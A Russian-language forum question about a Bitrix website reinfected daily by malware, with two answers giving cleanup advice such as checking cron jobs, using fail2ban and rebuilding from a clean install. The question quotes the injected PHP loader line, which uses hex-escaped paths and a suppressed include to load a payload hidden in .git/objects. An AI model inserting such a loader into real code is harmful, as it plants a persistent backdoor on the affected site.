Задать вопрос
@allgenl
1с-битрикс

Вирус на сайте добавляет строки в index.php по всем директориям. Как избавиться?

Пример кода, который добавляет вирус в файл index.php:
/*bc657*/
$r8 = "/ho\x6de3/login/public_ht\x6dl/.git/objects/34/.28e85653.css"; $trxc61 = substr($r8, 0); @include_once /* nk */ ($trxc61);
/*bc657*/


При наличии данного кода в используемых файлах возникают ошибки и страница не открывается. В самом коде видно что прописывается путь к файлу, который является вредоносным. После его удаления файл создаётся в другой папке .git/objects/

Ранее вирус также во многих директориях создал .htaccess. Я удалил их все. Сейчас только основной. Сканил сайт айболитом, удалял вредоносные файлы. Опять появляются.

Также помимо этого приходит куча запросов к папкам и файлам Wordpress, хотя сайт на Битриксе. Таких запросов бывает до 1000 за буквально 5 минут. Если блокирую один IP, начинают приходить с другого.

Сама подмена происходит раз в сутки, обычно ночью, в разное время.
  • Вопрос задан
  • 214 просмотров
3 комментария
Подписаться 1 Средний 3 комментария
Пригласить эксперта
Ответы на вопрос 2
pLavrenov
@pLavrenov
Разработка сайтов
Точных указаний что делать в этом случае нет, каждый сайт смотрится и решения там комплексные.

Блокировкой адресов может заниматься fail2ban без твоего участия.

Если что-то происходит каждый день и в одно и тоже время - первое что надо смотреть это крон в панели хостинга. Если там что-то есть то этот дырявый хостинг отправляется в мусорку и сайт переносится на reg.ru (никаких реклам, просто не вижу причин выбирать что-то кроме него)

На папки вордпреса идут запросы потому что скрипт комплексный.

Виной может быть нуленый плагин (или как там оно называется в этом овне), в админке есть проверка на целостность ее надо сделать в первую очередь.
Ответ написан
Комментировать
Комментировать
@vlaero
1. Делаете дампы файлов и бд, разворачиваете их у себя локально
2. В кастомных сущностях (папки/файлы шаблона, компонентов) вычищаете все подозрительное, зараженное
3. В бд вычищаете все подозрительное
4. Локально разворачиваете чистый битрикс
5. Переносите свои кастомные сущности в чистую установку
6. Подключаете очищенную бд к сайту
7. Смотрите работу сайта

Если все ок, то переносите чистые файлы и базу на основной сервер.
Далее меняете доступы к админке, базе, хостингу (серверу).

Если не ок, то возвращаемся к п2
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
Разработчик CMS Битрикс
Студия Фонарь
от 120 000 до 140 000 ₽
Программист 1С
Автограф Йошкар-Ола
от 100 000 ₽
Программист 1С
ЦДТ Москва
До 260 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Записать рекламные видео креативы для мобильной игры
25 нояб. 2024, в 05:56
3000 руб./за проект
Аудит и поддержка проекта внедрению виртуальной архитектуры (АСУ ТП)
25 нояб. 2024, в 03:04
500000 руб./за проект
Сделать простой лендинг
25 нояб. 2024, в 02:45
2000 руб./за проект
Ещё заказы